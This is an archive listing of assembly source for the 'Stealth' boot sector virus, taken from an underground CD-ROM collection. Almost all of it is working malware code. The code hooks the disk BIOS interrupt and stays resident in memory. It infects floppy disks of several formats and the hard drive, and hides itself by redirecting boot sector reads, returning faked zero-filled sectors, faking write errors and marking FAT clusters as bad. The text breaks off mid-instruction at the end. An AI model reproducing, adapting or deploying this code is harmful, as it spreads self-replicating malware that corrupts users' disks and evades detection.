Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / zrodla / s / stealth.asm < prev next >

Wrap

Assembly Source File | 1998-01-14 | 54.3 KB | 1,219 lines

;The Stealth Virus is a boot sector virus which remains resident in memory ;after boot so it can infect disks. It hides itself on the disk and includes ;special anti-detection interrupt traps so that it is very difficult to ;locate. This is a very infective and crafty virus. COMSEG SEGMENT PARA ASSUME CS:COMSEG,DS:COMSEG,ES:COMSEG,SS:COMSEG ORG 100H START: jmp BOOT_START ;******************************************************************************* ;* BIOS DATA AREA * ;******************************************************************************* ORG 413H MEMSIZE DW 640 ;size of memory installed, in KB ;******************************************************************************* ;* VIRUS CODE STARTS HERE * ;******************************************************************************* ORG 7000H STEALTH: ;A label for the beginning of the virus ;******************************************************************************* ;Format data consists of Track #, Head #, Sector # and Sector size code (2=512b) ;for every sector on the track. This is put at the very start of the virus so ;that when sectors are formatted, we will not run into a DMA boundary, which ;would cause the format to fail. This is a false error, but one that happens ;with some BIOS's, so we avoid it by putting this data first. FMT_12M: ;Format data for Track 80, Head 1 on a 1.2 Meg diskette, DB 80,1,1,2, 80,1,2,2, 80,1,3,2, 80,1,4,2, 80,1,5,2, 80,1,6,2 FMT_360: ;Format data for Track 40, Head 1 on a 360K diskette DB 40,1,1,2, 40,1,2,2, 40,1,3,2, 40,1,4,2, 40,1,5,2, 40,1,6,2 ;******************************************************************************* ;* INTERRUPT 13H HANDLER * ;******************************************************************************* OLD_13H DD ? ;Old interrupt 13H vector goes here INT_13H: sti cmp ah,2 ;we want to intercept reads jz READ_FUNCTION cmp ah,3 ;and writes to all disks jz WRITE_FUNCTION I13R: jmp DWORD PTR cs:[OLD_13H] ;******************************************************************************* ;This section of code handles all attempts to access the Disk BIOS Function 2, ;(Read). It checks for several key situations where it must jump into action. ;they are: ; 1) If an attempt is made to read the boot sector, it must be processed ; through READ_BOOT, so an infected boot sector is never seen. Instead, ; the original boot sector is read. ; 2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on ; drive C are read, they are processed by READ_HARD, so the virus ; code is never seen on the hard drive. ; 3) If an attempt is made to read Track 1, Head 0, Sector 1 on the ; floppy, this routine checks to see if the floppy has already been ; infected, and if not, it goes ahead and infects it. READ_FUNCTION: ;Disk Read Function Handler cmp dh,0 ;is it head 0? jnz I13R ;nope, let BIOS handle it cmp ch,1 ;is it track 1? jz RF0 ;yes, go do special processing cmp ch,0 ;is it track 0? jnz I13R ;no, let BIOS handle it cmp cl,1 ;track 0, is it sector 1 jz READ_BOOT ;yes, go handle boot sector read cmp dl,80H ;no, is it hard drive c:? jz RF1 ;yes, go check further jmp I13R ;else let BIOS handle it RF0: cmp dl,80H ;is it hard disk? jnc I13R ;yes, let BIOS handle read cmp cl,1 ;no, floppy, is it sector 1? jnz I13R ;no, let BIOS handle it call CHECK_DISK ;is floppy already infected? jz I13R ;yes so let BIOS handle it call INFECT_FLOPPY ;no, go infect the diskette jmp SHORT I13R ;and then let BIOS do the read RF1: cmp cl,8 ;sector < 8? jnc I13R ;nope, let BIOS handle it jmp READ_HARD ;yes, divert read on the C drive ;******************************************************************************* ;This section of code handles all attempts to access the Disk BIOS Function 3, ;(Write). It checks for two key situations where it must jump into action. They ;are: ; 1) If an attempt is made to write the boot sector, it must be processed ; through WRITE_BOOT, so an infected boot sector is never overwritten. ; instead, the write is redirected to where the original boot sector is ; hidden. ; 2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on ; drive C are written, they are processed by WRITE_HARD, so the virus ; code is never overwritten. WRITE_FUNCTION: ;BIOS Disk Write Function cmp dh,0 ;is it head 0? jnz I13R ;nope, let BIOS handle it cmp ch,0 ;is it track 0? jnz I13R ;nope, let BIOS handle it cmp cl,1 ;is it sector 1 jnz WF1 ;nope, check for hard drive jmp WRITE_BOOT ;yes, go handle boot sector read WF1: cmp dl,80H ;is it the hard drive c: ? jnz I13R ;no, another hard drive cmp cl,8 ;sector < 8? jnc I13R ;nope, let BIOS handle it jmp WRITE_HARD ;else take care of writing to C: ;******************************************************************************* ;This section of code handles reading the boot sector. There are three ;possibilities: 1) The disk is not infected, in which case the read should be ;passed directly to BIOS, 2) The disk is infected and only one sector is ;requested, in which case this routine figures out where the original boot ;sector is and reads it, and 3) The disk is infected and more than one sector ;is requested, in which case this routine breaks the read up into two calls to ;the ROM BIOS, one to fetch the original boot sector, and another to fetch the ;additional sectors being read. One of the complexities in this last case is ;that the routine must return the registers set up as if only one read had ;been performed. ; To determine if the disk is infected, the routine reads the real boot sector ;into SCRATCHBUF and calls IS_VBS. If that returns affirmative (z set), then ;this routine goes to get the original boot sector, etc., otherwise it calls ROM ;BIOS and allows a second read to take place to get the boot sector into the ;requested buffer at es:bx. READ_BOOT: push ax ;save registers push bx push cx push dx push ds push es push bp push cs ;set ds=es=cs pop es push cs pop ds mov bp,sp ;and bp=sp RB001: mov al,dl call GET_BOOT_SEC ;read the real boot sector jnc RB01 ;ok, go on call GET_BOOT_SEC ;do it again to make sure jnc RB01 ;ok, go on jmp RB_GOON ;error, let BIOS return err code RB01: call IS_VBS ;is it the viral boot sector? jz RB02 ;yes, jump jmp RB_GOON ;no, let ROM BIOS read sector RB02:; mov bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START) mov bx,OFFSET SB_DR_FLAG ;required instead of ^ for a86 mov al,BYTE PTR [bx] ;get disk type of disk being cmp al,80H ;read, and make an index of it jnz RB1 mov al,4 RB1: mov bl,3 ;to look up location of boot sec mul bl add ax,OFFSET BOOT_SECTOR_LOCATION ;ax=@BOOT_SECTOR_LOCATION table mov bx,ax mov ch,[bx] ;get track of orig boot sector mov dh,[bx+1] ;get head of orig boot sector mov cl,[bx+2] ;get sector of orig boot sector mov dl,ss:[bp+6] ;get drive from original spec mov bx,ss:[bp+10] ;get read buffer offset mov ax,ss:[bp+2] ;and segment mov es,ax ;from original specification mov ax,201H ;prepare to read 1 sector pushf call DWORD PTR [OLD_13H] ;do BIOS int 13H mov al,ss:[bp+12] ;see if original request cmp al,1 ;was for more than one sector jz RB_EXIT ;no, go exit READ_1NEXT: ;more than 1 sec requested, so pop bp ;read the rest as a second call pop es ;to BIOS pop ds pop dx ;first restore these registers pop cx pop bx pop ax add bx,512 ;prepare to call BIOS for push ax ;balance of read dec al ;get registers straight for it inc cl cmp dl,80H ;is it the hard drive? jnz RB15 ;nope, go handle floppy push bx ;handle an infected hard drive push cx ;by faking read on extra sectors push dx ;and returning a block of 0's push si push di push ds push bp push es pop ds ;ds=es mov BYTE PTR [bx],0 ;set first byte in buffer = 0 mov si,bx mov di,bx inc di mov ah,0 ;ax=number of sectors to read mov bx,512 ;bytes per sector mul bx ;# of bytes to read in dx:ax<64K mov cx,ax dec cx ;number of bytes to move in cx rep movsb ;fill buffer with 0's clc ;clear c, fake read successful pushf ;then restore everyting properly pop ax ;first set flag register mov ss:[bp+20],ax ;as stored on the stack pop bp ;and pop all registers pop ds pop di pop si pop dx pop cx pop bx pop ax mov ah,0 dec cl sub bx,512 iret ;and get out RB15: ;read next sectors on floppy pushf ;call BIOS to call DWORD PTR cs:[OLD_13H] ;read the rest (must use cs) push ax push bp mov bp,sp pushf ;use c flag from BIOS call pop ax ;to set c flag on the stack mov ss:[bp+10],ax jc RB2 ;if error, return ah from 2nd rd sub bx,512 ;else restore registers so dec cl ;it looks as if only one read pop bp ;was performed pop ax pop ax ;and exit with ah=0 to indicate mov ah,0 ;successful read iret RB2: pop bp ;error on 2nd read pop ax ;so clean up stack add sp,2 ;and get out iret RB_EXIT: ;exit from single sector read mov ax,ss:[bp+18] ;set the c flag on the stack push ax ;to indicate successful read popf clc pushf pop ax mov ss:[bp+18],ax pop bp ;restore all registers pop es pop ds pop dx pop cx pop bx pop ax mov ah,0 iret ;and get out RB_GOON: ;This passes control to BIOS pop bp ;for uninfected disks pop es ;just restore all registers to pop ds ;their original values pop dx pop cx pop bx pop ax jmp I13R ;and go jump to BIOS ;******************************************************************************* ;This table identifies where the original boot sector is located for each ;of the various disk types. It is used by READ_BOOT and WRITE_BOOT to redirect ;boot sector reads and writes. BOOT_SECTOR_LOCATION: DB 40,1,6 ;Track, head, sector, 360K drive DB 80,1,6 ;1.2M drive DB 79,1,9 ;720K drive DB 79,1,18 ;1.44M drive DB 0,0,7 ;Hard drive ;******************************************************************************* ;This routine handles writing the boot sector for all disks. It checks to see ;if the disk has been infected, and if not, allows BIOS to handle the write. ;If the disk is infected, this routine redirects the write to put the boot ;sector being written in the reserved area for the original boot sector. It ;must also handle the writing of multiple sectors properly, just as READ_BOOT ;did. WRITE_BOOT: push ax ;save everything we might change push bx push cx push dx push ds push es push bp mov bp,sp push cs ;ds=es=cs pop ds push cs pop es mov al,dl call GET_BOOT_SEC ;read the real boot sector jnc WB01 call GET_BOOT_SEC ;do it again if first failed jnc WB01 jmp WB_GOON ;error on read, let BIOS take it WB01: call IS_VBS ;else, is disk infected? jz WB02 ;yes jmp WB_GOON ;no, let ROM BIOS write sector WB02:; mov bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START) mov bx,OFFSET SB_DR_FLAG ;required instead of ^ for a86 mov al,BYTE PTR [bx] cmp al,80H ;infected, so redirect the write jnz WB1 mov al,4 ;make an index of the drive type WB1: mov bl,3 mul bl add ax,OFFSET BOOT_SECTOR_LOCATION ;ax=@table entry mov bx,ax mov ch,[bx] ;get the location of original mov dh,[bx+1] ;boot sector on disk mov cl,[bx+2] ;prepare for the write mov dl,ss:[bp+6] mov bx,ss:[bp+10] mov ax,ss:[bp+2] mov es,ax mov ax,301H pushf call DWORD PTR [OLD_13H] ;and do it sti mov dl,ss:[bp+6] cmp dl,80H ;was write going to hard drive? jnz WB_15 ;no mov BYTE PTR [DR_FLAG],80H ;yes, update partition info push si push di mov di,OFFSET PART ;just move it from sec we just mov si,ss:[bp+10] ;wrote into the viral boot sec add si,OFFSET PART sub si,OFFSET BOOT_START push es pop ds push cs pop es ;switch ds and es around mov cx,20 rep movsw ;and do the move push cs pop ds mov ax,301H mov bx,OFFSET BOOT_START mov cx,1 ;Track 0, Sector 1 mov dx,80H ;drive 80H, Head 0 pushf ;go write updated viral boot sec call DWORD PTR [OLD_13H] ;with new partition info pop di ;clean up pop si WB_15: mov al,ss:[bp+12] cmp al,1 ;was write more than 1 sector? jz WB_EXIT ;if not, then exit WRITE_1NEXT: ;more than 1 sector mov dl,ss:[bp+6] ;see if it's the hard drive cmp dl,80H jz WB_EXIT ;if so, ignore rest of the write pop bp ;floppy drive, go write the rest pop es ;as a second call to BIOS pop ds pop dx pop cx ;restore all registers pop bx pop ax add bx,512 ;and modify a few to push ax ;drop writing the first sector dec al inc cl pushf call DWORD PTR cs:[OLD_13H] ;go write the rest sti push ax push bp mov bp,sp pushf ;use c flag from call pop ax ;to set c flag on the stack mov ss:[bp+10],ax jc WB2 ;an error ;so exit with ah from 2nd int 13 sub bx,512 dec cl pop bp pop ax pop ax ;else exit with ah=0 mov ah,0 ;to indicate success iret WB2: pop bp ;exit with ah from 2nd pop ax ;interrupt add sp,2 iret WB_EXIT: ;exit after 1st write mov ax,ss:[bp+18] ;set carry on stack to indicate push ax ;a successful write operation popf clc pushf pop ax mov ss:[bp+18],ax pop bp ;restore all registers and exit pop es pop ds pop dx pop cx pop bx pop ax mov ah,0 iret WB_GOON: ;pass control to ROM BIOS pop bp ;just restore all registers pop es pop ds pop dx pop cx pop bx pop ax jmp I13R ;and go do it ;******************************************************************************* ;Read hard disk sectors on Track 0, Head 0, Sec > 1. If the disk is infected, ;then instead of reading the true data there, return a block of 0's, since ;0 is the data stored in a freshly formatted but unused sector. This will ;fake the caller out and keep him from knowing that the virus is hiding there. ;If the disk is not infected, return the true data stored in those sectors. READ_HARD: call CHECK_DISK ;see if disk is infected jnz RWH_EX ;no, let BIOS handle the read push ax ;else save registers push bx push cx push dx push si push di push ds push bp mov bp,sp mov BYTE PTR es:[bx],0 ;zero the first byte in the blk push es pop ds mov si,bx ;set up es:di and ds:si mov di,bx ;for a transfer inc di mov ah,0 ;ax=number of sectors to read mov bx,512 ;bytes per sector mul bx ;number of bytes to read in ax mov cx,ax dec cx ;number of bytes to move rep movsb ;do fake read of all 0's mov ax,ss:[bp+20] ;now set c flag push ax ;to indicate succesful read popf clc pushf pop ax mov ss:[bp+20],ax pop bp ;restore everything and exit pop ds pop di pop si pop dx pop cx pop bx pop ax mov ah,0 ;set to indicate successful read iret RWH_EX: jmp I13R ;pass control to BIOS ;******************************************************************************* ;Handle writes to hard disk Track 0, Head 0, 1<Sec<8. We must stop the write if ;the disk is infected. Instead, fake the return of an error by setting carry ;and returning ah=4 (sector not found). WRITE_HARD: call CHECK_DISK ;see if the disk is infected jnz RWH_EX ;no, let BIOS handle it all push bp ;yes, infected, so . . . push ax mov bp,sp mov ax,ss:[bp+8] ;get flags off of stack push ax popf ;put them in current flags stc ;set the carry flag pushf pop ax mov ss:[bp+8],ax ;and put flags back on stack pop ax mov ah,4 ;set up sector not found error pop bp iret ;and get out of ISR ;******************************************************************************* ;See if disk dl is infected already. If so, return with Z set. This ;does not assume that registers have been saved, and saves/restores everything ;but the flags. CHECK_DISK: push ax ;save everything push bx push cx push dx push ds push es push cs pop ds push cs pop es mov al,dl call GET_BOOT_SEC ;read the boot sector jnc CD1 xor al,al ;act as if infected jmp SHORT CD2 ;in the event of an error CD1: call IS_VBS ;see if viral boot sec (set z) CD2: pop es ;restore everything pop ds ;except the z flag pop dx pop cx pop bx pop ax ret ;******************************************************************************* ;This routine determines from the boot sector parameters what kind of floppy ;disk is in the drive being accessed, and calls the proper infection routine ;to infect the drive. It has no safeguards to prevent infecting an already ;infected disk. the routine CHECK_DISK must be called first to make sure you ;want to infect before you go and do it. This restores all registers to their ;initial state. INFECT_FLOPPY: pushf ;save everything push si push di push ax push bx push cx push dx push ds push es push cs pop es push cs pop ds sti mov bx,OFFSET SCRATCHBUF + 13H ;@ of sec cnt in boot sector mov bx,[bx] ;get sector count for this disk mov al,dl cmp bx,720 ;is it 360K? (720 sectors) jnz IF_1 ;no, try another possibility call INFECT_360K ;yes, infect it jmp SHORT IF_R ;and get out IF_1: cmp bx,2400 ;is it 1.2M? (2400 sectors) jnz IF_2 ;no, try another possibility call INFECT_12M ;yes, infect it jmp SHORT IF_R ;and get out IF_2: cmp bx,1440 ;is it 720K 3 1/2"? (1440 secs) jnz IF_3 ;no, try another possibility call INFECT_720K ;yes, infect it jmp SHORT IF_R ;and get out IF_3: cmp bx,2880 ;is it 1.44M 3 1/2"? (2880 secs) jnz IF_R ;no - don't infect this disk call INFECT_144M ;yes - infect it IF_R: pop es ;restore everyting and return pop ds pop dx pop cx pop bx pop ax pop di pop si popf ret ;******************************************************************************* ;Infect a 360 Kilobyte drive. This is done by formatting Track 40, Head 0, ;Sectors 1 to 6, putting the present boot sector in Sector 6 with the virus ;code in sectors 1 through 5, and then replacing the boot sector on the disk ;with the viral boot sector. INFECT_360K: call FORMAT_360 ;format the required sectors jc INF360_EXIT mov bx,OFFSET SCRATCHBUF ;and go write current boot sec push ax ;at Track 40, Head 1, Sector 6 mov dl,al mov dh,1 ;head 1 mov cx,2806H ;track 40, sector 6 mov ax,0301H ;BIOS write, for 1 sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax jc INF360_EXIT mov di,OFFSET BOOT_DATA ; mov si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START) mov si,OFFSET SB_BOOT_DATA ;required instead of ^ for A86 mov cx,32H / 2 ;copy boot sector disk info over rep movsw ;to new boot sector mov al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well mov BYTE PTR [BOOT_START + 1FDH],al mov BYTE PTR [DR_FLAG],0 ;set proper drive type push ax ;write new boot sector to disk mov bx,OFFSET BOOT_START ;buffer for the new boot sector call PUT_BOOT_SEC ;go write it to disk pop ax jc INF360_EXIT mov bx,OFFSET STEALTH ;buffer for 5 secs of stealth mov dl,al ;drive to write to mov dh,1 ;head 1 mov cx,2801H ;track 40, sector 1 mov ax,0305H ;write 5 sectors pushf call DWORD PTR [OLD_13H] ;(int 13H) INF360_EXIT: ret ;all done ;This routine formats Track 40, Head 1 so we can infect a 360k diskette. FORMAT_360: push ax ;save drive number in al mov dl,al ;dl=drive no. mov dh,1 ;head 0 mov cx,2801H ;track 40, start at sector 1 mov ax,0506H ;format 6 sectors mov bx,OFFSET FMT_360 ;format info for this sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax ret ;******************************************************************************* ;Infect 1.2 megabyte Floppy Disk Drive AL with this virus. This is essentially ;the same as the 360K case, except we format Track 80 instead of track 40. INFECT_12M: call FORMAT_12M ;format the required sectors jc INF12M_EXIT mov bx,OFFSET SCRATCHBUF ;and go boot sector at push ax mov dl,al mov dh,1 ;head 1 mov cx,5006H ;track 80, sector 6 mov ax,0301H ;BIOS write, for 1 sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax jc INF12M_EXIT mov di,OFFSET BOOT_DATA ; mov si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START) mov si,OFFSET SB_BOOT_DATA ;required instead of ^ for A86 mov cx,32H / 2 ;copy boot sector disk info over rep movsw ;to new (viral) boot sector mov al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well mov BYTE PTR [BOOT_START + 1FDH],al mov BYTE PTR [DR_FLAG],1 ;set proper diskette type push ax ;and write viral boot sec to disk mov bx,OFFSET BOOT_START ;buffer for viral boot sector call PUT_BOOT_SEC ;go write it to disk pop ax jc INF12M_EXIT mov bx,OFFSET STEALTH ;buffer for 5 secs of stealth mov dl,al ;drive to write to mov dh,1 ;head 1 mov cx,5001H ;track 80, sector 1 mov ax,0305H ;write 5 sectors pushf call DWORD PTR [OLD_13H] ;(int 13H) INF12M_EXIT: ret ;all done ;Format Track 80, Head 1 so we can infect a 1.2 Meg diskette. FORMAT_12M: push ax mov dl,al ;set drive number mov dh,1 ;head 1 mov cx,5001H ;track 80, start at sector 1 mov ax,0506H ;format 6 sectors mov bx,OFFSET FMT_12M ;format info for this sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax ret ;******************************************************************************* ;Infect a 3 1/2" 720K drive. This process is a little different than for 5 1/4" ;drives. The virus goes in an existing data area on the disk, so no formatting ;is required. Instead, we 1) Read the boot sector and put it at Track 79, Head 1 ;sector 9, 2) Put the five sectors of stealth routines at Track 79, Head 1, ;sector 4-8, 3) Put the viral boot sector at Track 0, Head 0, Sector 1, and ;4) Mark the diskette's FAT to indicate that the last three clusters are bad, ;so that DOS will not attempt to overwrite the virus code. INFECT_720K: mov bx,OFFSET SCRATCHBUF ;go write boot sec at push ax mov dl,al mov dh,1 ;head 1 mov cx,4F09H ;track 79, sector 9 mov ax,0301H ;BIOS write, for 1 sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax jc INF720K_EXIT ;exit on error push ax mov di,OFFSET BOOT_DATA ; mov si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START) mov si,OFFSET SB_BOOT_DATA ;required instead of ^ for A86 mov cx,32H / 2 ;copy boot sector disk info over rep movsw ;to new boot sector mov al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well mov BYTE PTR [BOOT_START + 1FDH],al mov BYTE PTR [DR_FLAG],2 ;set proper diskette type pop ax push ax ;write new boot sector to disk mov bx,OFFSET BOOT_START call PUT_BOOT_SEC ;go write it pop ax jc INF720K_EXIT mov bx,OFFSET STEALTH ;buffer for 5 sectors of stealth mov dl,al ;drive to write to mov dh,1 ;head 1 mov cx,4F04H ;track 79, sector 4 mov ax,0305H ;write 5 sectors pushf call DWORD PTR [OLD_13H] ;(int 13H) jc INF720K_EXIT mov bx,OFFSET SCRATCHBUF ;now modify the FAT mov ax,0201H ;first read 1 sector mov cx,4 ;track 0, sector 4, head 0 mov dh,0 pushf call DWORD PTR [OLD_13H] ;(int 13H) jc INF720K_EXIT mov di,OFFSET SCRATCHBUF + 44 ;modify the FAT in RAM mov ax,7FF7H ;marking the last 3 clusters stosw ;as bad mov ax,0F7FFH stosw mov ax,0FFFH stosw mov ax,0301H ;now write the FAT back to disk mov cx,4 ;at track 0, sector 4, head 0 pushf call DWORD PTR [OLD_13H] jc INF720K_EXIT mov ax,0301H ;do second FAT too mov cx,7 ;at track 0, sector 7, head 0 pushf call DWORD PTR [OLD_13H] INF720K_EXIT: ret ;all done ;******************************************************************************* ;This routine infects a 1.44 megabyte 3 1/2" diskette. It is essentially the ;same as infecting a 720K diskette, except that the virus is placed in sectors ;13-17 on Track 79, Head 0, and the original boot sector is placed in Sector 18. INFECT_144M: mov bx,OFFSET SCRATCHBUF ;go write boot sec at push ax mov dl,al mov dh,1 ;head 1 mov cx,4F12H ;track 79, sector 18 mov ax,0301H ;BIOS write, for 1 sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax jc INF144M_EXIT push ax mov di,OFFSET BOOT_DATA ; mov si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START) mov si,OFFSET SB_BOOT_DATA ;required instead of ^ for A86 mov cx,32H / 2 ;copy boot sector disk info over rep movsw ;to new boot sector mov al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well mov BYTE PTR [BOOT_START + 1FDH],al mov BYTE PTR [DR_FLAG],3 ;set proper diskette type pop ax push ax ;and write new boot sector to disk mov bx,OFFSET BOOT_START call PUT_BOOT_SEC ;go write it to disk pop ax jc INF144M_EXIT mov bx,OFFSET STEALTH ;buffer for 5 sectors of stealth mov dl,al ;drive to write to mov dh,1 ;head 1 mov cx,4F0DH ;track 79, sector 13 mov ax,0305H ;write 5 sectors pushf call DWORD PTR [OLD_13H] ;(int 13H) mov bx,OFFSET SCRATCHBUF ;now modify the FAT mov ax,0201H ;first read 1 sector mov cx,0AH ;track 0, sector 10, head 0 mov dh,0 pushf call DWORD PTR [OLD_13H] ;(int 13H) jc INF144M_EXIT mov di,OFFSET SCRATCHBUF + 0A8H ;modify the FAT in RAM mov ax,es:[di] and ax,000FH add ax,0FF70H stosw mov ax,07FF7H ;marking the last 6 clusters stosw ;as bad mov ax,0F7FFH stosw mov ax,0FF7FH stosw mov ax,0FF7H stosw mov ax,0301H ;now write the FAT back to disk mov cx,0AH ;at track 0, sector 10, head 0 pushf call DWORD PTR [OLD_13H] jc INF144M_EXIT mov ax,0301H ;do second FAT too mov cx,1 ;at track 0, sector 1, head 1 mov dh,1 pushf call DWORD PTR [OLD_13H] INF144M_EXIT: ret ;all done ;******************************************************************************* ;Infect Hard Disk Drive AL with this virus. This involves the following steps: ;A) Read the present boot sector. B) Copy it to Track 0, Head 0, Sector 7. ;C) Copy the disk parameter info into the viral boot sector in memory. D) Copy ;the viral boot sector to Track 0, Head 0, Sector 1. E) Copy the STEALTH ;routines to Track 0, Head 0, Sector 2, 5 sectors total. INFECT_HARD: mov al,80H ;set drive type flag to hard disk mov BYTE PTR [DR_FLAG],al ;cause that's where it's going call GET_BOOT_SEC ;read the present boot sector mov bx,OFFSET SCRATCHBUF ;and go write it at push ax mov dl,al mov dh,0 ;head 0 mov cx,0007H ;track 0, sector 7 mov ax,0301H ;BIOS write, for 1 sector pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax push ax mov di,OFFSET BOOT_DATA ; mov si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START) mov si,OFFSET SB_BOOT_DATA ;required instead of ^ for A86 mov cx,32H / 2 ;copy boot sector disk info over rep movsw ;to new boot sector mov di,OFFSET BOOT_START + 200H - 42H mov si,OFFSET SCRATCHBUF + 200H - 42H mov cx,21H ;copy partition table rep movsw ;to new boot sector too! pop ax push ax ;and write viral boot sector mov bx,OFFSET BOOT_START call PUT_BOOT_SEC pop ax mov bx,OFFSET STEALTH ;buffer for 5 sectors of stealth mov dl,al ;drive to write to mov dh,0 ;head 0 mov cx,0002H ;track 0, sector 2 mov ax,0305H ;write 5 sectors pushf call DWORD PTR [OLD_13H] ;(int 13H) ret ;******************************************************************************* ;This routine determines if a hard drive C: exists, and returns NZ if it does, ;Z if it does not. IS_HARD_THERE: push ds xor ax,ax mov ds,ax mov bx,475H ;Get hard disk count from bios mov al,[bx] ;put it in al pop ds cmp al,0 ;and see if al=0 (no drives) ret ;******************************************************************************* ;Read the boot sector on the drive AL into SCRATCHBUF. This routine must ;prserve AL! GET_BOOT_SEC: push ax mov bx,OFFSET SCRATCHBUF ;buffer for the boot sector mov dl,al ;this is the drive to read from mov dh,0 ;head 0 mov ch,0 ;track 0 mov cl,1 ;sector 1 mov al,1 ;read 1 sector mov ah,2 ;BIOS read function pushf call DWORD PTR [OLD_13H] ;(int 13H) pop ax ret ;******************************************************************************* ;This routine writes the data at es:bx to the drive in al at Track 0, ;Head 0, Sector 1 for 1 sector, making that data the new boot sector. PUT_BOOT_SEC: mov dl,al ;this is the drive to write to mov dh,0 ;head 0 mov ch,0 ;track 0 mov cl,1 ;sector 1 mov al,1 ;read 1 sector mov ah,3 ;BIOS write function pushf call DWORD PTR [OLD_13H] ;(int 13H) ret ;******************************************************************************* ;Determine whether the boot sector in SCRATCHBUF is the viral boot sector. ;Returns Z if it is, NZ if not. The first 30 bytes of code, starting at BOOT, ;are checked to see if they are identical. If so, it must be the viral boot ;sector. It is assumed that es and ds are properly set to this segment when ;this is called. IS_VBS: push si ;save these push di cld mov di,OFFSET BOOT ;set up for a compare ; mov si,OFFSET SCRATCHBUF + (OFFSET BOOT - OFFSET BOOT_START) mov si,OFFSET SB_BOOT ;required instead of ^ for A86 mov cx,15 repz cmpsw ;compare 30 bytes pop di ;restore these pop si ret ;and return with z properly set ;******************************************************************************* ;* A SCRATCH PAD BUFFER FOR DISK READS AND WRITES * ;******************************************************************************* ORG 7A00H SCRATCHBUF: ;a total of 512 bytes DB 3 dup (0) SB_BOOT_DATA: ;with references to correspond DB 32H dup (0) ;to various areas in the boot SB_DR_FLAG: ;sector at 7C00 DB 0 ;these are only needed by A86 SB_BOOT: ;tasm and masm will let you DB 458 dup (0) ;just do "db 512 dup (0)" ;******************************************************************************* ;* THIS IS THE REPLACEMENT (VIRAL) BOOT SECTOR * ;******************************************************************************* ORG 7C00H ;Starting location for boot sec BOOT_START: jmp SHORT BOOT ;jump over data area db 090H ;an extra byte for near jump BOOT_DATA: db 32H dup (?) ;data area and default dbt ;(copied from orig boot sector) DR_FLAG:DB 0 ;Drive type flag, 0=360K Floppy ; 1=1.2M Floppy ; 2=720K Floppy ; 3=1.4M Floppy ; 80H=Hard Disk ;The boot sector code starts here BOOT: cli ;interrupts off xor ax,ax mov ss,ax mov ds,ax mov es,ax ;set up segment registers mov sp,OFFSET BOOT_START ;and stack pointer sti mov ax,[MEMSIZE] ;get size of memory available mov cl,6 ;on this system, in Kilobytes shl ax,cl ;convert KBytes into a segment sub ax,7E0H ;subtract enough so this code mov es,ax ;will have the right offset to sub [MEMSIZE],4 ;go memory resident in high ram GO_RELOC: mov si,OFFSET BOOT_START ;set up ds:si and es:di in order mov di,si ;to relocate this code mov cx,256 ;to high memory rep movsw ;and go move this sector push es mov ax,OFFSET RELOC push ax ;push new far @RELOC onto stack retf ;and go there with retf RELOC: ;now we're in high memory push es ;so let's install the virus pop ds mov bx,OFFSET STEALTH ;set up buffer to read virus mov al,BYTE PTR [DR_FLAG] ;drive number cmp al,0 ;Load from proper drive type jz LOAD_360 cmp al,1 jz LOAD_12M cmp al,2 jz LOAD_720 cmp al,3 jz LOAD_14M ;if none of the above, ;then it's a hard disk LOAD_HARD: ;load virus from hard disk mov dx,80H ;hard drive 80H, head 0, mov ch,0 ;track 0, mov cl,2 ;start at sector 2 jmp SHORT LOAD1 LOAD_360: ;load virus from 360 K floppy mov ch,40 ;track 40 mov cl,1 ;start at sector 1 jmp SHORT LOAD LOAD_12M: ;load virus from 1.2 Meg floppy mov ch,80 ;track 80 mov cl,1 ;start at sector 1 jmp SHORT LOAD LOAD_720: ;load virus from 720K floppy mov ch,79 ;track 79 mov cl,4 ;start at sector 4 jmp SHORT LOAD ;go do it LOAD_14M: ;load from 1.44 Meg floppy mov ch,79 ;track 79 mov cl,13 ;start at sector 13 ; jmp SHORT LOAD ;go do it LOAD: mov dx,100H ;disk 0, head 1 LOAD1: mov ax,206H ;read 6 sectors int 13H ;call BIOS to read it MOVE_OLD_BS: xor ax,ax ;now move old boot sector into mov es,ax ;low memory mov si,OFFSET SCRATCHBUF ;at 0000:7C00 mov di,OFFSET BOOT_START mov cx,256 rep movsw SET_SEGMENTS: ;change segments around a bit cli mov ax,cs mov ss,ax mov sp,OFFSET STEALTH ;set up the stack for the virus push cs ;and also the es register pop es INSTALL_INT13H: ;now hook the Disk BIOS int xor ax,ax mov ds,ax mov si,13H*4 ;save the old int 13H vector mov di,OFFSET OLD_13H movsw movsw mov ax,OFFSET INT_13H ;and set up new interrupt 13H mov bx,13H*4 ;which everybody will have to mov ds:[bx],ax ;use from now on mov ax,es mov ds:[bx+2],ax sti CHECK_DRIVE: push cs ;set ds to point here now pop ds cmp BYTE PTR [DR_FLAG],80H ;if booting from a hard drive, jz DONE ;nothing else needed at boot FLOPPY_DISK: ;if loading from a floppy drive, call IS_HARD_THERE ;see if a hard disk exists here jz DONE ;no hard disk, all done booting mov al,80H ;else load boot sector from C: call GET_BOOT_SEC ;into SCRATCHBUF call IS_VBS ;and see if C: is infected jz DONE ;yes, all done booting call INFECT_HARD ;else go infect hard drive C: DONE: mov si,OFFSET PART ;clean partition data out of mov di,OFFSET PART+1 ;memory image of boot sector mov cx,3FH ;so it doesn't get spread to mov 